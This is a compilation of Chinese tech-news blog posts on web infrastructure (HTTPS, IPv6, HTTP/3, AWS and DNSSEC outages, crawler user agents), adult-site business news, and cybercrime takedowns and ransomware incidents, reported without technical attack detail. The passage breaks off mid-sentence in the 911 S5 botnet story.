年,在vr刚有应用场景之时,pornhub就率先推出了vr分类,而且支持市面上绝大多数设备,包含google研发的那个纸盒子做的cardboard。Pornhub还和多家玩具制作商合作了多款满足不同需求的成人玩具。 甚至,玩具和观看的视频内容还能联动……此处省略细节介绍 1 万字,请自行脑补。 各位单身狗请想像一下,再过几年,你带着vr眼镜浏览着Pornhub,同时还玩着成人玩具……还要什么女朋友? (图为爱尔兰总统用vr设备浏览pornhub) 二、各种逆天的运营动作 1、社交网络人格化 Pornhub产品和技术很厉害,但运营水平一点都不差。现在被我国企业广为推崇的人格化社交媒体,Pornhub老早就玩起来了,其官方twitter是个叫「aria」的妹子。这个人设吸引了很多人的关注,因为“她”不仅给你推荐视频,还会带你一起看电影……(此处同样省略细节描述 1 万字) 2、追热点 追热点这件事儿是很多运营同学最头疼的事,情人节、超级碗、奥运会、圣诞节,几乎每一个节日,Pornhub都会有一波稳定的运营动作。 并且,Pornhub每次都会公布基于热点和站内用户浏览行为变化的大数据分析。 (图为 18 年超级碗期间,pornhub的男女流量占比变化) 看看上面这张图,有没有一点淘宝双十一后发布电商购物大数据的赶脚!!! 另外,对于社会事件,Pornhub也是很有态度的。在 17 年 4 月 9 日美联航强行拖华裔乘客下机事件发生后,pornhub官微对美联航破口大骂:“你tmd连老子一个色情网站都不如。” 有情调,有个性,还有脾气的全球最大成人小电影网站,怎能让人不爱? 3、脑洞无敌的活动 Pornhub的活动五花八门,有时候,我感觉可能地球已经无法满足他们的脑洞了。 举一个小例子,下图为Pornhub在站内举行的一个叫做 Sexploration(性+探索)的众筹活动,打算筹集 340 万美元,将两位“宇航员” Eva Lovia 和 Johnny Sins 送上太空,拍一部在太空中的OOXX影片…… 拍到太空的小电影,你想不想来看? 三、不仅是啪啪啪,他们还关注公益 上面已经讲了,Pornhub其实是很有态度,也很有脑洞的。 但,脑洞跟态度一结合,他们就开始玩起了公益…… 众所周知,熊猫之所以稀有是因为极低的繁殖能力,为了解决这一困难,一些机智的饲养员给熊猫播放了很多熊猫交配的小电影来提高熊猫的配种能力。 但大熊猫的片子可以说是非常的稀缺,反反复复就只能看那几部,时间久了大熊猫们也就看厌了…… 而身为全球最大啪啪啪小电影网站的Pronhub在得知这个事情后,举办了一个名为Panda Style(熊猫性爱姿势)的运动,号召人们带着熊猫面具啪啪啪并录像,之后上传到网站主页上。 然后,Pornhub再将这些视频整合,并播放给熊猫们观看,帮助其提高性欲,提升繁殖水平…… 不管你是观看或者拍摄了cos大熊猫的小视频,都算为大熊猫公益组织贡献了一份力量。。。 当然,Pornhub的公益举措绝不仅限于此。除此之外,他们还做了很多: 2018 年,有一些地区的居民因为当地的地名带有部分“性暗示”成分而经常被其他人取笑,得知此事后,为了关照这群用户,Pornhub决定:免费让这些地区的居民升级为「Pornhub Premium」高级会员,终身享有免费观赏高清成人影片的资格。 2016 年,在国际鲸鱼日发起活动,Pornhub决定:其网站上的视频每有 2000 个点击,就捐一美分给致力于保护鲸鱼的慈善机构。 2012 年,Pornhub举办了一個名叫「拯救乳房!」的针对乳腺癌的慈善筹款活动,观众每观看网站中的“巨乳”视频,网站就会向乳腺研究机构捐赠一分钱。 …... 此外,Pornhub还出过唱片、玩过快闪、和时尚界合作、向性研究者捐款,每年 2 月 1 号,网站上会有蕾哈娜的彩蛋…… 总之,Pornhub让人惊叹和惊艳的地方,绝对是层出不穷的。 而花了 2 天时间认真研究了Pornhub后,我也受到极大的震动。事实证明—— 哪怕是在再Low再见不得光的行业,只有你拥有足够的认真和创意,也能把一个产品的设计和运营玩出花来…… 在任何一个行业,只要你做的业务是面向用户提供服务的,保持对用户的洞察、尊重、关注,并始终对社会传递正向的价值观,永远都能让你受到行业的认可和尊敬。 最后,严正强调一下,本文是一篇特别严肃的学习文。(微笑脸) #### 全球9成以上网站已经使用HTTPS加密 根据 外媒Netmarketshare发布的 的数据显示,截止到2019 年 10 月全球使用HTTPS密的 Web 流量的比例已经超过了九成。HTTPS网站加密传输协议几乎已经接近普及。 并且这个数据可以通过其它来源进行验证:根据 Google 透明度报告“Chrome 中的 HTTPS 加密情况”来看,在谷歌这几年连推带吓的强制推广网站必须接入HTTPS协议的宣传下,到2019 年 10 月 Chrome 加载网页中启用加密的比例已经达到了 95%,几乎等于谷歌搜索内的网站已经全部普及。 而互联网上排名前 100 位的非 Google 网站中默认使用 HTTPS 的有 90 位。百度和淘宝网也在其中。 有数据显示,在全球范围,美国的 HTTPS 比例为 92%,俄罗斯 85%,日本 80%,印尼 74%,国内的话,HTTPS网站还是挺落后的,特别是一些中小企业网站,基本在50%左右,而个人网站比例较高,达到70%左右,总体来说国内HTTPS不超过60%,形式挺严峻的,毕竟现在网站部署HTTPS才会使网站更安全,而安全这块国内网站一直做得不是很好,以主机吧认识的企业网站为例,几乎没考虑过上HTTPS。 未来HTTPS一定会越来越普及,HTTP也将成为历史,所以网站部署HTTPS是势在必行的,很多网站管理怕HTTPS花钱,其它免费的SSL证书挺多的,大家可以放心使用的,而百度云加速近期也开放了免费CDN HTTPS权限,是可以免费HTTPS的,推荐大家去试试吧。     #### 全球IPv4地址正式耗尽 我们正在向IPv6前进 11月26日 消息:11 月 25 日下午,Nikolas Pediaditis在一份电子邮件中宣布:全球 43 亿个IPv4 地址已经正式分配完毕。这意味着没有更多的IPv4 地址可以分配给ISP和其他大型网络基础设施提供商。该过程自 80 年代以来就已预见到,顶级地址实际上已经在 2012 年耗尽。 以下是消息原文: 亲爱的同事们:今天下午 15:35,我们从可用地址池中完成了最后的 IPv4 地址分配。对网络运营商来说,这样的一天并不让人感到惊讶,RIPE 社区早就预见并作出了相应的规划。实际上,正式由于社区对这些资源的负责人管理,我们才能在 2012 年的最后一批 /8 地址分配完之后,继续服务区域内成千上万个新网络提供 / 22 分配。 从理论上来讲,IPv4 地址的耗尽,意味着无法将任何新的 IPv4 设备添加到互联网上。但实际上,我们还有一些方法,能够缓冲 IPv4 地址耗尽所造成的影响。 首先,ISP 那里可以重用或回收未使用的 IPv4 地址。其次,我们可以通过网络地址转换(NAT)技术,于 ISP 路由器后面悄悄使用相同的公网 IP 。当然,最终我们还是投向 IPv6 的怀抱。为了平稳过渡,全行业都已经未雨绸缪地制定了应对策略,以便在整个互联网上实现 3.×10^38 个地址空间的直接点对点连接。 据目前国内宽带运营商已经悄悄的支持IPV6了,比如主机吧自己家的宽带就分配有一个IPV6地址 测试发现不愧新一个网络协议,IPV6响应更快,如果访问同是支持IPV6的网站,响应会快很多。   对于站长来说,如果网站没有支持IPV6的,尽快实现吧,以后IPV6将会慢慢普及,IPV4也将退出历史舞台的,对目前的我们来说最好是能实现支持IPV4的同时支持IPV6,如果你的服务器只有IPV4 IP,那么可以考虑给网站做一个CDN,支持IPV6的CDN目前百度云加速是支持的。 #### 全球IT咨询巨头埃森哲被黑客攻击,索要 3.2 亿元赎金 全球IT咨询巨头埃森哲遭到了LockBit 勒索软件团伙发动的勒索软件网络攻击。埃森哲是一家以服务于汽车、银行、政府、技术、能源和电信等众多行业而闻名的IT巨头。埃森哲2020年收入443亿美元,市值2032亿美元,是全球最大的科技咨询公司之一,在全球50个国家或地区雇有约569000名员工。勒索软件团伙扬言要泄露窃取的数据 一个名为LockBit 2.0的勒索软件团伙扬言要发布据称在最近的一次网络攻击中从埃森哲窃取而来的文件数据。威胁分子表示,如果受害者没有支付赎金,他们将在今天晚些时候发布数据:LockBit勒索软件运营商泄露网站泄露数据已进入倒计时虽然LockBit没有出示所窃取数据的证据,但他们声称愿意将其出售给任何感兴趣的组织或个人。LockBit在其数据泄露网站上称:“这些人无视隐私和安全。我确实希望他们的服务比我这个内部人员看到的做得更好。如果你有兴趣购买一些数据库,请联系我们。”至于泄露何时发生、何时被检测到、其范围或利用漏洞的技术原因,这些方面的具体细节尚不清楚。埃森哲告诉BleepingComputer,受影响的系统已通过备份恢复过来:“通过我们的安全控制和协议,我们在自己的一个环境中发现了异常活动。我们立即遏制了事态,并隔离了那些受影响的服务器。”,“我们通过备份完全恢复了受影响的系统。埃森哲的业务运营或我们客户的系统并没有受到影响,”6 TB文件被盗,索要5000万美元赎金 在Cyble研究团队看到的对话中,LockBit勒索软件团伙声称已从埃森哲窃取了6 TB的数据,要求支付5000万美元(约3.2亿人民币)的赎金。这伙威胁分子声称已通过公司“内部人员”访问了埃森哲的网络。熟悉这次攻击的消息人士告诉BleepingComputer,埃森哲已向至少一家CTI供应商确认了遭到勒索软件攻击,这家 IT服务提供商也正在通知更多的客户。此外,网络犯罪情报公司Hudson Rock透露,埃森哲有2500台属于员工和合作伙伴的计算机已中招:LockBit此前攻击过许多受害者,包括英国的默西铁路网络。本周早些时候,澳大利亚政府警告LockBit 2.0勒索软件攻击升级,此前有人看到该团伙大肆搜罗他们计划攻击的那些公司的内部人员,以数百万美元作为奖励。 #### 全球主机论坛hostloc又被墙了 主机帮好久没有进过hostloc论坛逛了,今天特地访问了下,发现居然访问不了,显示访问超时。 主机帮第一反映是被墙了,因为前两年hostloc论坛就被墙过,后来域名停了半年左右,又恢复了。 通过ping工具ping域名发现果然是被墙了(被墙的体现在于国内DNS解析会强制解析至一些乱七八糟的IP上) 访问备用域名.net后缀的也一样被墙了。 hostloc这种被墙的方式是长城防火墙对付非法网站的常用方法,把域名的国内DNS强制指向非正确源服务器的IP,使网站无法正常访问。 看来此次全球主机论坛hostloc要凉了,这个论坛大多数是一些使用国外服务器商的交流平台,不过近几年关于主机的交流少了,反而是交流涉翻墙、涉黄的较多。被墙可能跟这些内容有关。 #### 全球互联网可能在接下来的48小时出现故障,或影响一些用户 行根区域域名系统安全扩展(DNSSEC)KSKS轮转。 “轮换KSK意味着生成新的加密公钥和私钥对,并将新的公共组件分发给操作验证解析系统的有关方,包括:互联网服务提供商、企业网络管理员及其他域名系统(DNS)解析系统运营商、DNS解析系统软件开发商、系统集成商,以及安装或发送根区域“信任锚”(trust anchor)的软硬件分发商。KSK用于对区域签名密钥(ZSK)进行加密签名,根区域维护者使用ZSK对互联网DNS的根区域进行DNSSEC签名。 维护最新的KSK对于确保负责DNSSEC验证的DNS解析系统在轮换后继续正常运行至关重要。如果没有最新的根区域KSK,将意味着负责DNSSEC验证的DNS解析系统将无法解析任何DNS查询。 KSK轮换计划由根区域管理合作伙伴开发,ICANN充当IANA功能运营商的角色,Verisign充当根区域维护者的角色,美国商务部国家电信和信息管理局(NTIA)充当根区域,ICANN如是说。 《俄罗斯时报》撰文警告,在接下来48小时内,世界各地的互联网用户面临网络连接失败的风险,原因是控制互联网的主域服务器及相关基础设施将停运一段时间。 全球互联网地图 不过卡塔尔通信监管局(CRA)在一份备忘录中告诫公众,切勿相信在Facebook上流传甚广的关于声称“全球互联网中断两天”的误导性信息。 CRA备忘录声称,这是确保安全、稳定又有弹性的DNS的一项重要举措。 备忘录还称:“为了进一步澄清,如果各自的网络运营商或互联网服务提供商(ISP)还没有为这一变化做好准备,一些互联网用户可能会受到影响。然而如果启用适当的系统安全扩展,可以避免这种影响。” CRA强调,.qa、.gov.qa、.org.qa和.com.q等域名在轮换过程中不会受到影响。然而,全球大多数国家的政府却对潜在的网络中断保持缄默。 移动研究集团的分析师埃尔达•默塔津(Eldar Murtazin)告诉《俄罗斯时报》,互联网用户可能在周五面临网络中断。访问某些资源可能会出现问题,网页打开速度会变慢。如果某些用户使用过时的提供商网络,访问网络可能会遇到问题。 初步测试表明轮换会带来很小的问题,但并不保证肯定如此。 专门研究数字经济的阿塞尼•施切尔辛(Arseny Shcheltsin)表示,由于主要软件已经得到了更新,因此无需担心。 施切尔辛表示,由于政府撑腰的不法分子攻击互联网核心的威胁不断增加,更改加密密钥的程序已变得必不可少。 全球股市崩溃的同时,全球互联网崩溃的威胁也来临。这一切发生在距离美国中期选举不到一个月的时间。暴风云正在聚集。 #### 全球互联网服务大规模中断,AWS故障引发连锁反应 一场突如其来的全球性互联网中断让无数用户措手不及,从游戏到社交,从金融到电商,众多知名网站和应用纷纷“瘫痪”。 北京时间2025年10月20日下午,一次大规模互联网服务中断影响了全球众多知名网站和应用。亚马逊云计算服务AWS确认其美国东部区域出现故障,导致依赖其基础设施的多个平台出现连接异常。 根据Downdetector网站数据显示,从美国东部时间周一凌晨(北京时间中午)开始,亚马逊电商、AWS云服务、Epic游戏商店、Steam、微软Xbox等服务均出现异常。 01 故障规模:全球数字服务受冲击 监测网站Downdetector显示,美国东部时间周一上午报告的问题数量激增,仅亚马逊AWS就有超过2681起问题报告。 此次故障波及范围极广,受影响的服务包括社交媒体、游戏、金融、生产力工具和娱乐平台等多个领域。 社交媒体平台Snapchat、通信应用Signal、设计平台Canva、游戏平台Roblox和Fortnite以及加密货币交易所Coinbase和交易应用Robinhood均出现服务中断。 即使是亚马逊自家的服务也未能幸免,包括亚马逊电商网站、Prime Video和Alexa智能助手都出现了问题。 02 故障根源:AWS核心服务出现异常 亚马逊在其AWS服务状态页面确认,美国东部区域的多个AWS服务错误率增加和延迟升高。 该公司表示,美国东部区域的DynamoDB数据库服务遭到“中断”,影响了其他20项服务。 AWS在服务健康更新中声明:“我们可以确认美国东部区域向DynamoDB端点发出的请求出现了显著错误率。这个问题也影响了美国东部区域的其他AWS服务。” 据AWS称,工程师已立即投入工作,积极采取措施解决问題,并全面了解根本原因。 核心问题出现在AWS的US-EAST-1区域,这是AWS最关键的数据中心区域之一,位于弗吉尼亚州北部。 该区域承载着互联网基础设施的很大一部分,其故障导致了广泛的连锁反应。 03 连锁反应:多元服务集体瘫痪 故障发生后,依赖AWS服务的各类平台出现连锁故障。 AI初创公司Perplexity的CEO Aravind Srinivas在X平台上表示,其服务中断的根源是AWS问题。 通信应用Signal总裁Meredith Whittaker也确认他们的平台受到了AWS中断的影响。 金融领域,不仅Coinbase和Robinhood受到影响,PayPal的Venmo和Chime等金融平台也出现了问题。 游戏服务是重灾区,Fortnite、Roblox、Clash Royale和Clash of Clans等热门游戏平台均出现中断。 教育平台Duolingo和设计工具Canva同样未能幸免。 04 行业反思:云服务集中化隐忧 此次大规模中断事件再次引发了对云计算基础设施集中化风险的关注。 当核心云服务出现故障时,任何单点失败都可能在全球数字生态系统中引发连锁反应。 亚马逊网络服务自2006推出以来,现已主导云计算市场,占亚马逊利润的大部分,年收入超过1000亿美元。 它为无数公司提供底层计算能力,实际上构成了现代互联网的支柱。 “云浓度”(cloud concentration)的系统性风险已成为科技行业日益关注的问题。 当如此多的服务依赖同一提供商时,单一故障点就可能在全球数字生态系统中引发连锁反应。 弗吉尼亚州北部庞大的数据中心走廊发生的故障在全球范围内引起了涟漪效应,从美国的Snapchat到欧洲的Vodafone,再到亚洲的各类数字服务,无不感受到这次中断的影响。 这不是AWS US-EAST-1区域第一次出现重大故障——该区域在2020年、2021年和2023年都发生过类似的中断事件。 此次事件再次揭示了现代互联网高度依赖集中式云基础设施的脆弱性。 #### 全球安全设备季度跟踪报告:UTM 增长 5.8%、Web安全和消息传递安全各增长6.8%和24.6% 据 IDC 近日发布的《全球安全设备季度跟踪报告》显示,2019年第四季度整个安全设备市场的单位出货量和收入同同实现了正增长。2019年第四季度全球收入同比增长9.4%,达到48亿美元。单位出货量也出现了类似的增长,同比猛增21.1%,达到了近130万台。 传统防火墙这个细分市场为全球收入增长做出了最大的贡献。该细分市场在2019年第四季度的收入比2018年第四季度增加了1.92亿美元。 尽管统一威胁管理(UTM)是最大的整体细分市场,但同比仅增长5.8%,2019年第四季度占全球安全设备市场的57.1%。 Web安全和消息传递安全这两个细分市场继续显示出强劲增长的迹象,分别同比增长6.8%和24.6%。 入侵检测和防御(IDP)与混合VPN和IPsec VPN一样,成为该季度收入下降的唯一几个细分市场。 SSL VPN的正增长抵消了混合VPN和IPsec VPN增长下滑的颓势,导致VPN市场同比增长持平。 区域亮点 2019年第四季度,美国占整个安全设备市场收入的38.2%,低于2019年第三季度的40.6%,但高于2018年第四季度的37.0%。西欧同比增长11.1%,中东和非洲(MEA)地区同比增长14.5%。UTM、Web安全性以及企业重新开始关注消息传递安全正在推动北美和欧洲市场迎来增长,而传统的防火墙和消息传递安全对于亚太区(不包括日本)和MEA来说仍然很重要。IDC的安全产品高级分析师Pete Finalle说:“第四季度为2019年划上了圆满的句号,2019年因此实现了两位数的持续且强劲的年度增长,这主要来源于全球范围内提高的UTM普及率以及强劲的区域性趋势推动亚太和中东两大地区的防火墙市场迎来增长。”2019年第四季度全球安全设备收入、市场份额和增长率前五强(收入单位:百万美元) #### 全球已有25.5%网站采用HTTP/3 DoNews7月22日消息(刘文轩)Cloudflare称,在全球主要浏览器中,Google Chrome与Microsoft Edge都已在2020年11月支持HTTP/3,Mozilla Firefox也在2021年4月支持HTTP/3,只剩苹果Safari需要手动开启,而且尚处实验阶段,不过,这也意味着全球有超过7成的网络用户都采用了兼容HTTP/3的浏览器。 专门制定网络标准的互联网工程任务组(Internet Engineering Task Force,IETF)在今年6月正式发布了新的HTTP/3标准,而W3Techs的统计则显示,全球前1,000万个网站中,已有25.5%的比例采用HTTP/3。 HTTP/3为超文本传输协议(HyperText Transfer Protocol,HTTP)的第三个主要版本,HTTP是全球网络数据通讯的基础,所谓的超文本文件包含了可连至其它资源的超链接,像是用户只要点鼠标就能存取;而HTTP/3最大的改变在于以基于用户数据包协议(User Datagram Protocol,UDP)的QUIC通用传输层网络协议取代了传输控制协议(Transmission Control Protocol,TCP)。 QUIC则是Google于2012年发布的协议,随后被IETF采用。 IETF解释称,HTTP/3专注于解决HTTP/2所出现的问题。虽然HTTP/2解决了应用层协议的队头阻塞(head-of-line blocking)问题,却在底层的TCP传输协议出现队头阻塞,QUIC刚好可以解决该问题;此外,HTTP/3也能加速网络浏览,在处于容易丢失封包的网络环境时,HTTP/3具备更稳定的表现。 #### 全球常见网络爬虫蜘蛛详解 一、引言 网络爬虫,作为互联网信息检索的重要工具,其种类和数量繁多。本文旨在深入介绍主流搜索引擎和工具的爬虫,并重点提供它们的用户代理(UA)字符串,以帮助网站管理员更好地识别和管理这些爬虫。 二、主流网络爬虫蜘蛛及其UA字符串 Googlebot(谷歌爬虫) 简介:Googlebot是谷歌的搜索引擎蜘蛛,其市场份额占据主导地位。 UA字符串示例:Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) Bingbot(必应爬虫) 简介:Bingbot是微软的搜索引擎蜘蛛,与Windows操作系统深度融合,提供多种搜索服务。 UA字符串示例:Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Baiduspider(百度爬虫) 简介:Baiduspider是百度搜索引擎的蜘蛛,用于爬取和索引网页内容。 UA字符串示例:Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html) Bytespider(头条搜索爬虫) 简介:Bytespider是字节跳动旗下头条搜索的爬虫,用于爬取网页内容以支持头条搜索服务。 UA字符串示例(PC端):Mozilla/5.0 (compatible; Bytespider; https://zhanzhang.toutiao.com/) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36 UA字符串示例(Android端):Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/) UA字符串示例(iOS端):Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.36 (KHTML, like Gecko) Version/7.0 Mobile/11D167 Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/) 其他主流爬虫 Yisouspider(神马搜索爬虫):UA字符串通常包含"Yisouspider"关键词。 YandexBot(Yandex搜索引擎爬虫):俄罗斯搜索巨头Yandex的蜘蛛,UA字符串通常包含"YandexBot"关键词。 360Spider(360搜索爬虫):360搜索引擎的蜘蛛,用于爬取网页以支持360搜索服务。 PetalBot(华为花瓣搜索爬虫):华为自研搜索引擎的爬虫,符合Internet机器人协议。 Sogou web spider(搜狗搜索爬虫):搜狗搜索引擎的蜘蛛,用于爬取网页内容。 AhrefsBot:国外网络营销类网站的爬虫,主要用于SEO分析和监控。 SemrushBot:SEMrush的蜘蛛爬虫,提供搜索引擎优化数据。 BLEXBot:WebMeUp的蜘蛛爬虫,用于收集反向链接数据。 AdsBot:谷歌Google AdWords的蜘蛛,用于广告联盟相关服务。 MJ12bot:Majestic搜索引擎营销的爬虫,专注于外链查询。 DotBot:Moz的网络爬虫程序,用于分析网站SEO外链数据。 Applebot:Apple推出的网络爬虫工具,用于Siri建议和聚焦建议等产品。 CCbot:Common Crawl Bot,非营利性基金会提供的Web爬网数据开放存储库。 DuckDuckGoBot:DuckDuckGo搜索引擎的爬虫,强调用户隐私权保护。 yacybot:Yacy搜索引擎的蜘蛛。 DataForSeoBot:DataForSEO网站的蜘蛛,提供高质量SEO数据。 三、如何屏蔽无用爬虫 识别并屏蔽无用爬虫 通过分析网站日志,了解哪些爬虫对网站无贡献或带来负面影响。 利用百度云防护Web应用防火墙拦截特定UA关键词,如MJ12bot #### 全球排名前一千万网站有1/3使用WordPress程序 开源内容管理程序 WordPress 官方博客庆祝了它在流量排名前一千万网站中的市场占有率达到了三分之一。根据 W3Techs 的数据,WordPress 在前一千万网站的市场份额从一年前的 29.9% 增加到了 33.4%。 WordPress 表示对此非常自豪:它在 2005 年庆祝了 5 万次下载,2011 年 1 月市场份额达到 13.1%,2019 年达到了 33.4%。 它在 2 月 21 日发布的最新版本下载量已经接近 1400 万次。 主机吧也使用WordPress,可能说WordPress非常强大,什么插件都有,而且可选的模板也很多,相比国内的开源程序不仅安全性有待参考,而且长年不更新,功能少、模板少,很多基本死了。 不棕wordpress也有自己的缺点,就是越来越肿,配置低的服务器已经有些带不动他了,不过随着云服务器的普及,价格也越来越便宜,这个问题已经不算什么问题了。   #### 全球最出名的盗版网站“海盗湾”没落了:多个顶级域名被卖 还记得那个扬言把数据发射到太空的的公司吗? 没错就是著名盗版网站:海盗湾,创办17年后,盗版大站“海盗湾”正滑向没落的深渊。 据国外追踪显示,其曾持有的顶级域名Piratebay.org本周被拍卖行Dropcatch以5万美元的价格交易给clvrfls。 很快,ThePiratebay.com、ThePiratebay.net以及Piratebay.net等也将被转手。 参与竞标的域名人士David Marshall称,因为SEO、域名质量本身等因素,此次拍卖成交价很高。未来好好经营的话,即便是做转发,广告收入也将会不菲。 事实上,传播盗版资源本身就饱受争议,海盗湾已经遭受过两次大规模的服务器搜查行动,多位早期创办者锒铛入狱。 不过,风雨飘摇中海盗湾还是没有偃旗息鼓,如今依然吸引着全球数百万访问者。 海盗湾没落其实是互联网版权意识崛起的一个缩影,跟国内一样,目前已经很难看到盗版电影网站了,因为这些做盗版的要么被巨额索赔,要么已经被抓,电影网站已经成为了版权犯罪的高发区了,风险极高。 #### 全球最大 Web 服务器 Nginx 出现动荡 近期,全球最大的Web服务器Nginx的核心开发者Maxim Dounin离开了F5领导的Nginx,并推出了分叉版FreeNginx。 原因 Maxim Dounin的决定是由于他与F5公司在安全政策上产生了分歧。F5公司的非技术管理人员决定干涉Nginx多年来使用的安全政策,无视安全政策和广大开发者的立场。尽管从所有权的角度来看此举完全可以理解,但这意味着Dounin不能再控制对Nginx做哪些变更。 后续行动 因此,从2024年2月18日起,Dounin将不再参与由F5主持的Nginx开发工作。相反,他开始了另一个项目:FreeNginx,它将由开发者运营,而不是由公司实体运营。FreeNginx的目标是使Nginx开发免受任意公司行为的影响,让大家都能从中受益。 影响 Nginx目前在全球大约三分之一的Web服务器上使用,以前归属于Nginx公司;2019年3月,Nginx被F5 Inc.以6.7亿美元收购。此次事件可能会对Nginx的未来产生一定的影响,具体影响还需要进一步观察。 #### 全球最大DDoS服务网站被端后 Europol向151000名用户追责 分布式拒绝服务(DDoS)是最令拥有在线客户公司头疼的攻击方式。Xbox Live,PSN,GitHub和Steam等主流服务平台均遭受过DDoS网络攻击,导致全球合法用户无法访问这些平台。在去年取缔了一个大型DDoS-for-hire网站之后,欧洲刑警组织(Europol)开始向该网站的注册用户采取法律行动。 2018 年 4 月Europol取缔了最大的DDoS for-hire网站webstresser.org之后,该执法机构正寻求对其151, 000 名注册用户采取法律行动。该执法机构表示它正在和英国、荷兰当局开展合作,追查该网站的一些注册用户。该网站声称发起了 400 多万次DDoS攻击,其服务费用可以低至每月 15 欧元。Europol已经展开行动,至少有 250 名网络用户很快面临应有的法律制裁。 #### 全球最大成人网站P站也要凉了? 最近,全球最大成人网站p站被爆锤了,先是被要求删除网站大量视频,后被Visa和Mastercard直接单方面断绝合作切断财路,无奈之下宣布只接受加密货币作为为P站唯一的支付方式!(估计比特币又得涨一波了) Pornhub估计很多站长都知道,这个全球唯一的合法合规成人网站,国内简称P站,P站拥有230条豁免权,网站流量堪称牛逼,每月35亿次访问,比美国互联网巨头网站Netflix、雅虎和亚马逊都要多。位列全球访问量最大网站第10,靠广告赚钱都赚到爆!据说全球每十个人中就有一个人访问过这个网站,当然国内是个例外,因为P站是被国内墙的,国内无法访问,即使是这样,这个网站流量依然全球第十,可见色情网站流量有多恐怖。 但是没想到的是,Pornhub最近摊上大事了,因为被《纽约时报》曝光,网站涉及未成年人违规视频。彻底引爆了舆论,210万人联名投诉要求下架该网站,没办法Pornhub自己开始大整改,网站1350万个视频被迫删除了880万个,仅剩400多万,这还没算完,随后又被信用卡公司Visa和万事达拒绝服务,彻底切断财路,无奈之下网站宣布,以后只接受加密货币作为默认支付方式,这一次这个全球最大成人网站彻底被掀了个底朝天! 最后,针对Pornhub加密货币成为P站唯一的支付方式和网站一连串整改有国外业内人士表示,从访问量和其他研究指标看,Pornhub是21世纪对社会影响第三大的科技公司,仅次于Facebook和谷歌,领先于微软、苹果和亚马逊。但是色情这东西不论在那个国家都是危险地带,Pornhub这次遭遇大洗牌,搞不好要关门凉凉! 当年海盗湾也是有类似经历,不知道Pornhub会不会走上这条路呢? #### 全球最大成人网站:Pornhub或将永久关停! 全球最大成人网站 或将永久关停! 没错,就是那个成立于加拿大蒙特利尔的 Pornhub,它也是世界上最大的成人网站。   P站,从2007年建立,成立这么多年一直允许任何用户上传“作品”,仅仅十余年间就做到了全球访问量第8的网站,视频总数超过了1000万部,   这篇文章曝光后,P站迫于压力删除了近9百万部视频,同时关闭了下载功能,让P站的内容社区接近夭折,从而元气大伤   一波未平一波又起 还有大量视频涉嫌泄露他人隐私,包括住址、名字等信息 最新诉讼内容要求Pornhub及母公司,赔偿受害者近亿元并且承担刑事责任。   而这一系列事件都可能会给P站造成致命的创伤,有业内人士表示,P站可能会在2021年的年底关停 资深老站长表示可惜…… #### 全球最大暗网交易平台被捣毁 查获20多台服务器 1月13日 消息:近年来,Facebook大型数据泄露、华住旗下酒店用户信息泄露等数据泄露事件频发再次引发了人们对“暗网”的关注。这个普通用户无法触达的领域,成为了犯罪嫌疑人非法买卖公民个人信息的主要集散地。 据外媒报道,当地时间1月12日,德国警方捣毁了全球最大暗网交易平台“黑市”(DarkMarket),并于摩尔多瓦和乌克兰查获20多台服务器,“黑市”经营者也已被逮捕。 被捣毁前,黑市平台主要兜售毒品、假钞、匿名SIM卡、窃取的信用卡数据以及恶意软件等。截至被查前,该平台上的卖家已经超过2400个,客户近50万。 平台在1月11日关闭前,交易至少达32万笔,营业额约1.4亿欧元。而为了捣毁这一犯罪团伙,德国警方花费了数月时间,在美国、澳大利亚、英国、丹麦等多国的协助下终于将该犯罪团伙拿下。 #### 全球最大游戏外挂案件告破 和平精英鸡腿挂主犯落网 3月26日 消息:据荔枝视频报道,去年3月,腾讯公司报案称旗下游戏“和平精英”有一款名为“鸡腿”的外挂在网上销售,该外挂可以实现自瞄,还有透视。 而就在今日,昆山警方宣布,全球最大游戏外挂——和平精英鸡腿外挂案告破。昆山警方辗转6省9地,一举捣毁17个外挂交易网站,抓获了李某、曹某等外挂代理商。 据嫌疑人交代,“鸡腿”外挂软件是以一种卡密的形式进行销售,分为天卡、周卡、月卡。而经过警方进一步调查,这些代理商的上家销售了多款游戏的外挂,销往上百个国家和地区,涉案资金流水达5亿元。 今年1月,昆山警方赶赴天津、湖南长沙,抓获了该游戏外挂组织两名主犯——全球运营负责人何某和全球财务负责人王某。 据悉,王某主要负责把卖外挂销售的利润,根据上线的要求进行分发,还搭建了一个虚拟币的交易平台,用比特币进行结算,躲避侦查。何某主要负责跟外挂的国外开发团队进行沟通,反馈用户使用问题,同时向代理商批发卡密。 目前,何某、王某等嫌疑人因涉嫌提供侵入、非法控制计算机信息系统程序、工具罪,已被依法采取刑事强制措施,该组织的境外涉案人员的打击工作仍在开展中。 主机吧只想说,相当高端的外挂团啊,都用到比特币了! #### 全球最大的僵尸网络911 S5 被美国捣毁,中国人管理员被抓 美国司法部携手国际合作伙伴捣毁了 911 S5 代理僵尸网络,并在新加坡逮捕了管理员、35 岁的中国公民 YunHe Wang(音译王云河)。 美国联邦调查局局长 Christopher Wray 说:“联邦调查局与我们的国际伙伴合作,开展了一次有条不紊的联合网络行动,成功捣毁了 911 S5 僵尸网络,这可能是全球有史以来最大的僵尸网络。”“我们逮捕了管理员王云河,没收了基础设施及资产,并对王云河及其同谋实施了制裁。”早在 2011 年,王云河及其同谋就使用捆绑代理后门的多个恶意 VPN 应用程序将恶意软件植入到了受害者的设备上。将受感染的设备添加到 911 S5 住宅代理服务的 VPN 应用程序包括:MaskVPN、DewVPN、PaladinVPN、ProxyGate、ShieldVPN 和 ShineVPN。联邦调查局提供了关于如何确定你是否是 911 S5 恶意软件受害者的详细信息,详见https://www.fbi.gov/investigate/cyber/how-to-identify-and-remove-vpn-applications-that-contain-911-s5-backdoors。 在 2014 年至 2022 年 7 月期间,这个团伙创建了一个由全球数百万台住宅 Windows 计算机组成的庞大网络,这些计算机与 1900 余万个独特的 IP 地址相连,其中包括美国境内的 613841 个 IP 地址。美国司法部声称:“王云河在全球范围内管理和控制着大约 150 台专用服务器,其中大约 76 